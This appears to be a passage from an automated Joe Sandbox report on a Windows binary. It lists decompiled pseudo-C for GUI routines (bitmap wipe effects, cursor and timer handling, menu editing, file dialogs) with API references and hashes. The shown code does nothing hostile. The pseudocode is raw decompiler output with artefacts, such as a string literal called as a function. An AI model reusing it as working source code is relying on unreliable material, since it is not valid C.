CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
SelectObject.GDI32(?,?), ref: 004045A7
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
DeleteObject.GDI32(?), ref: 004046C8
DeleteDC.GDI32(?), ref: 004046D2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404816, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x00404826
0x0040483b
0x00404846
0x0040486d
0x00404873
0x00404885
0x00404888
0x00404892
0x00000000
0x00000000
0x004048d6
0x00404921
0x0040492b
0x00404930
0x00404882
0x00404882
0x0040495d
0x00404967
0x00404971
0x0040497c

APIs

CreateCompatibleDC.GDI32(?), ref: 00404820
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
SelectObject.GDI32(?,?), ref: 00404846
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
DeleteObject.GDI32(?), ref: 00404967
DeleteDC.GDI32(?), ref: 00404971

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E758, Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t83;
				struct HWND__* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;

				_t87 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					L31:
					return _t42;
				}
				_t83 = E004249C4();
				_v12 = _t83;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t87 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
					L16:
					if(_v8 < 0) {
						L25:
						if( *(_v12 + 0x104) == 0xffffffff) {
							KillTimer( *(_t87 + 0x1c), 0xe001);
						}
						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
						L28:
						_t42 = 0xe000;
						if(_a4 != 0xe000) {
							goto L31;
						}
						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
						if(_v8 < 0) {
							goto L31;
						}
						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
					}
					ClientToScreen( *(_t87 + 0x1c),  &_v20);
					_push(_v20.y);
					_t85 = WindowFromPoint(_v20);
					if(_t85 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							goto L28;
						}
						goto L25;
					}
					_t60 =  *(_t87 + 0x1c);
					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t85) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
				_t72 = E00414CEF(_t87);
				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
					_v8 = _v8 | 0xffffffff;
				}
				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
				if(_t66 != 0) {
					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
				} else {
					_t86 = 0;
				}
				_t68 = E00413740(_t88, GetCapture());
				if(_t68 != _t87) {
					if(_t68 != 0) {
						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
					} else {
						_t81 = 0;
					}
					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
						_v8 = _v8 | 0xffffffff;
					}
				}
				goto L16;
			}

0x0041e760
0x0041e764
0x0041e76d
0x0041e8c5
0x0041e8c5
0x0041e8c5
0x0041e779
0x0041e77f
0x0041e782
0x0041e78f
0x0041e7a1
0x0041e7a6
0x0041e7a9
0x0041e80f
0x0041e816
0x0041e820
0x0041e87c
0x0041e886
0x0041e890
0x0041e890
0x0041e898
0x0041e89e
0x0041e89e
0x0041e8a7
0x00000000
0x00000000
0x0041e8ad
0x0041e8b3
0x00000000
0x00000000
0x00000000
0x0041e8bc
0x0041e829
0x0041e82f
0x0041e83b
0x0041e83f
0x0041e868
0x0041e868
0x0041e86b
0x0041e86f
0x0041e876
0x0041e87a
0x00000000
0x00000000
0x00000000
0x0041e87a
0x0041e841
0x0041e846
0x00000000
0x0041e854
0x0041e857
0x0041e85f
0x0041e861
0x0041e861
0x0041e866
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e866
0x0041e846
0x0041e7b4
0x0041e7bd
0x0041e7ca
0x0041e7ca
0x0041e7ce
0x0041e7d6
0x0041e7dc
0x0041e7d8
0x0041e7d8
0x0041e7d8
0x0041e7e6
0x0041e7ed
0x0041e7f1
0x0041e7f7
0x0041e7f3
0x0041e7f3
0x0041e7f3
0x0041e7fc
0x0041e809
0x0041e809
0x0041e7fc
0x00000000

APIs

GetKeyState.USER32(00000001), ref: 0041E764
GetCursorPos.USER32(?), ref: 0041E782
ScreenToClient.USER32 ref: 0041E78F
GetCapture.USER32 ref: 0041E7DF

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

ClientToScreen.USER32(?,?), ref: 0041E829
WindowFromPoint.USER32(?,?), ref: 0041E835
IsChild.USER32(?,00000000), ref: 0041E84A
KillTimer.USER32(?,0000E001), ref: 0041E890
KillTimer.USER32(?,0000E000), ref: 0041E8AD

Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040443F, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x0040444f
0x00404464
0x0040446f
0x00404496
0x0040449c
0x004044ae
0x004044b1
0x004044bb
0x00000000
0x00000000
0x004044ed
0x0040451b
0x00404525
0x0040452a
0x004044ab
0x004044ab
0x00404557
0x00404561
0x0040456b
0x00404576

APIs

CreateCompatibleDC.GDI32(?), ref: 00404449
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
SelectObject.GDI32(?,?), ref: 0040446F
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
DeleteObject.GDI32(?), ref: 00404561
DeleteDC.GDI32(?), ref: 0040456B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004046DE, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x004046ee
0x00404703
0x0040470e
0x00404735
0x0040473b
0x0040474d
0x00404750
0x0040475a
0x00000000
0x00000000
0x0040478c
0x004047ba
0x004047c4
0x004047c9
0x0040474a
0x0040474a
0x004047f6
0x00404800
0x0040480a
0x00404815

APIs

CreateCompatibleDC.GDI32(?), ref: 004046E8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
SelectObject.GDI32(?,?), ref: 0040470E
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
DeleteObject.GDI32(?), ref: 00404800
DeleteDC.GDI32(?), ref: 0040480A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF9A, Relevance: 13.6, APIs: 9, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041DF9A(signed int __ecx) {
				void* _t33;
				void* _t34;
				CHAR* _t41;
				signed int _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t51;
				void* _t53;
				signed int _t62;
				signed int _t73;
				signed int _t75;
				void* _t77;

				E00406520(E0042A610, _t77);
				_push(__ecx);
				_t51 =  *(_t77 + 0xc);
				_t62 = __ecx;
				_t33 = 0x80c83b00;
				 *(_t77 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
				if((_t51 & 0x00000004) != 0) {
					_t33 = 0x80c83300;
				}
				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
				if(_t34 != 0) {
					asm("sbb esi, esi");
					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
					_t53 = E00417635();
					DeleteMenu( *(_t53 + 4), 0xf000, 0);
					DeleteMenu( *(_t53 + 4), 0xf020, 0);
					DeleteMenu( *(_t53 + 4), 0xf030, 0);
					DeleteMenu( *(_t53 + 4), 0xf120, 0);
					_t41 =  *0x436980; // 0x436994
					 *(_t77 + 0xc) = _t41;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
					__eflags = _t42;
					if(_t42 != 0) {
						DeleteMenu( *(_t53 + 4), 0xf060, 0);
						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
					}
					_t75 =  *(_t77 - 0x10);
					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
					__eflags = _t43;
					if(_t43 != 0) {
						__eflags = _t75;
						if(_t75 != 0) {
							_t44 =  *(_t75 + 0x1c);
						} else {
							_t44 = 0;
						}
						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
						_push(1);
						_pop(0);
					}
					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
					_t27 = _t77 - 4;
					 *_t27 =  *(_t77 - 4) | 0xffffffff;
					__eflags =  *_t27;
					E00416AEC(_t77 + 0xc);
					_t34 = 0;
				} else {
					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t34;
			}

0x0041df9f
0x0041dfa4
0x0041dfa6
0x0041dfab
0x0041dfad
0x0041dfb5
0x0041dfb8
0x0041dfc2
0x0041dfc4
0x0041dfc4
0x0041dfde
0x0041dfe5
0x0041e001
0x0041e011
0x0041e019
0x0041e025
0x0041e031
0x0041e03d
0x0041e049
0x0041e055
0x0041e057
0x0041e05c
0x0041e05f
0x0041e06b
0x0041e070
0x0041e072
0x0041e07e
0x0041e08d
0x0041e08d
0x0041e09f
0x0041e0ab
0x0041e0b0
0x0041e0b2
0x0041e0b8
0x0041e0ba
0x0041e0c0
0x0041e0bc
0x0041e0bc
0x0041e0bc
0x0041e0d1
0x0041e0d6
0x0041e0d8
0x0041e0d8
0x0041e0d9
0x0041e0e0
0x0041e0e0
0x0041e0e0
0x0041e0e7
0x0041e0ec
0x0041dfe7
0x0041dfe7
0x0041dfe7
0x0041e0f4
0x0041e0fc

APIs

__EH_prolog.LIBCMT ref: 0041DF9F
GetSystemMenu.USER32(?,00000000), ref: 0041E013
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
AppendMenuA.USER32 ref: 0041E08D
SetParent.USER32(?,?,?,?,0000E81F,0000F011), ref: 0041E0CA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004104E7, Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004104E7(void* __ebx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ecx;
				void* __esi;
				struct HWND__* _t28;
				int _t31;
				int _t32;
				int _t34;
				void* _t35;
				void* _t40;
				void* _t41;
				signed int _t43;
				signed int _t52;

				_t40 = __ebx;
				_t52 = _t43;
				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t52 + 0x60) = E004120A5(_t52);
				E00413C3E();
				_t28 =  *(_t52 + 0x60);
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t52 + 0x60), 0);
				}
				_push(_t40);
				_t41 = E004249C4();
				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
					_push(_t52);
					"VWh\rDB"();
				} else {
					 *(_t41 + 0x18) = _t52;
				}
				_push(_t52 + 0x5c);
				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
					_t31 = GetSaveFileNameA();
				} else {
					_t31 = GetOpenFileNameA();
				}
				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
				_v8 = _t31;
				if(0 != 0) {
					EnableWindow( *(_t52 + 0x60), 1);
				}
				_t32 = IsWindow(_v12);
				_t64 = _t32;
				if(_t32 != 0) {
					SetFocus(_v12);
				}
				E004120DF(_t52, _t52, _t64);
				_t34 = _v8;
				if(_t34 == 0) {
					_t35 = 2;
					return _t35;
				}
				return _t34;
			}

0x004104e7
0x004104eb
0x00410504
0x00410514
0x0041051f
0x00410522
0x00410527
0x00410532
0x0041053f
0x00410541
0x00410547
0x00410547
0x00410549
0x00410556
0x00410558
0x0041055f
0x00410560
0x0041055a
0x0041055a
0x0041055a
0x0041056f
0x00410570
0x00410579
0x00410572
0x00410572
0x00410572
0x0041057e
0x00410582
0x00410589
0x00410590
0x00410590
0x00410596
0x0041059c
0x0041059e
0x004105a4
0x004105a4
0x004105ac
0x004105b1
0x004105ba
0x004105be
0x00000000
0x004105be
0x004105c1

APIs

lstrlenA.KERNEL32(?), ref: 004104F1
GetFocus.USER32 ref: 0041050C

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

IsWindowEnabled.USER32(?), ref: 00410535
EnableWindow.USER32(?,00000000), ref: 00410547
GetOpenFileNameA.COMDLG32(?), ref: 00410572
GetSaveFileNameA.COMDLG32(?), ref: 00410579
EnableWindow.USER32(?,00000001), ref: 00410590
IsWindow.USER32(00000000), ref: 00410596
SetFocus.USER32(00000000), ref: 004105A4

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3C1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				char _v296;
				void* __ebp;
				int _t61;
				signed char _t64;
				signed char _t69;
				void* _t79;
				struct HWND__* _t81;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t130;
				signed int _t131;
				intOrPtr _t134;
				void* _t136;

				_t130 = __edx;
				_t134 = _a4;
				_t109 = __ecx;
				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
					L3:
					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
					}
					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
					 *(_t109 + 0x64) = _t64;
					if((_t64 & 0x00000040) == 0) {
						E004165E5(_t134,  &_v296, 0x104);
						E0041A843( *(_t109 + 0x1c),  &_v296);
					}
					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
						_t70 = _t69 & 0x000000fe;
						__eflags = _t69 & 0x000000fe;
					} else {
						_t70 = _t69 | 0x00000001;
					}
					E004263C3(_t134, _t70);
					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
					if(_t131 > 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
					}
					if(_a8 == 0) {
						__eflags = _t131 - 1;
						if(_t131 < 1) {
							_t132 = _t109 + 0x7c;
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
						}
						_t115 =  *0x439bf4; // 0x2
						__eflags = 0;
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x439bf0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t109,  &_v20);
						if(_t131 < 1) {
